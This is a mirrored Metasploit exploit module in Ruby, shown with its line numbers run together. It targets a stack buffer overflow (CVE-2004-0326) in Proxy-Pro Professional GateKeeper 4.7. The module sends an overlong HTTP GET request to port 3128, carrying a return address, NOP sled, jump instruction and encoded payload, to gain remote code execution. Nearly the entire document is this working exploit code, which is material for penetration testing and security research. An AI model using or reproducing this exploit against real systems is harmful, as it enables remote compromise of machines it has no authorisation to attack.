CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/proxy/proxypro_http_get.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow',13'Description' => %q{14This module exploits a stack buffer overflow in Proxy-Pro Professional15GateKeeper 4.7. By sending a long HTTP GET to the default port16of 3128, a remote attacker could overflow a buffer and execute17arbitrary code.18},19'Author' => 'MC',20'License' => MSF_LICENSE,21'References' =>22[23['CVE', '2004-0326'],24['OSVDB', '4027'],25['BID', '9716'],26],27'DefaultOptions' =>28{29'EXITFUNC' => 'process',30},31'Payload' =>32{33'Space' => 500,34'BadChars' => "\x00+&=%\x0a\x0d\x20",35'StackAdjustment' => -3500,36},37'Platform' => 'win',38'Targets' =>39[40[ 'Proxy-Pro GateKeeper 4.7', { 'Ret' => 0x03b1e121 } ], # GKService.exe41],42'Privileged' => true,43'DisclosureDate' => '2004-02-23',44'DefaultTarget' => 0))4546register_options(47[48Opt::RPORT(3128)49])50end5152def exploit53connect5455print_status("Trying target #{target.name}...")5657sploit = "GET /" + rand_text_english(3603, payload_badchars)58sploit += payload.encoded + [target.ret].pack('V') + make_nops(10)59sploit += "\xe9" + [-497].pack('V') + " HTTP/1.0" + "\r\n\r\n"6061sock.put(sploit)62sock.get_once(-1, 3)6364handler65disconnect66end67end686970